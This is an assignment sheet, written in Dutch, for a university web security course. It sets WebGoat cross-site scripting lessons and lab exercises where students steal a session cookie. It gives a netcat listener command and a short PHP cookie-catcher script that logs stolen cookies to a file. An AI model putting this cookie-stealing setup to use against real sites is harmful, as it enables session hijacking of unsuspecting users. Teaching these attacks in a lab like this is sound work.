Web Security

Assignment 4 - deadline 26 mei 2017, 23:59

  1. Doe de onderstaande lessons uit de OWASP WebGoat, uit de categorie Cross-Site Scripting (XSS):

  2. Doe op http://websecurity.cs.ru.nl de volgende opdrachten

    For level 5 en 6, waar je met XSS een cookie moet stelen, heb je wat infrastuctuur nodig om het gestolen cookie op te vangen. De simpelste manier is met een machine waar je netcat kan draaien: met netcat -lvp 80 start je netcat-listener die naar poort 80 luistert op deze machine, en in je attack script moet je dan het IP adres van deze machine zetten. Het alternatief is met een web site op een of andere free hosting site waar je een simpele cookie stealer draait die bij incoming requests van de slachtoffer het cookie ontvangt en opslaat. Voorbeeld cookie stealing code in PHP is

    
    <?php                                     
      $cookie = $_GET["cookie"];     
      $file = fopen('cookielog.txt', 'a');    
      fwrite($file, $cookie . "\n\n");     
    ?>
    
    maar online vind je makkelijk andere voorbeelden van cookie catchers. (De php syntax is veranderd: _GET was vroeger HTTP_GET_VARS maar dat laatste werkt niet meer in de laatste PHP versies.)

  3. Lever je antwoorden in via de Inleveren optie op de websecurity-website.

    Je kunt samenwerken in paren, maar je moet de aanval zelf een keer onder je eigen Science login uitvoeren en inleveren op http://websecurity.cs.ru.nl.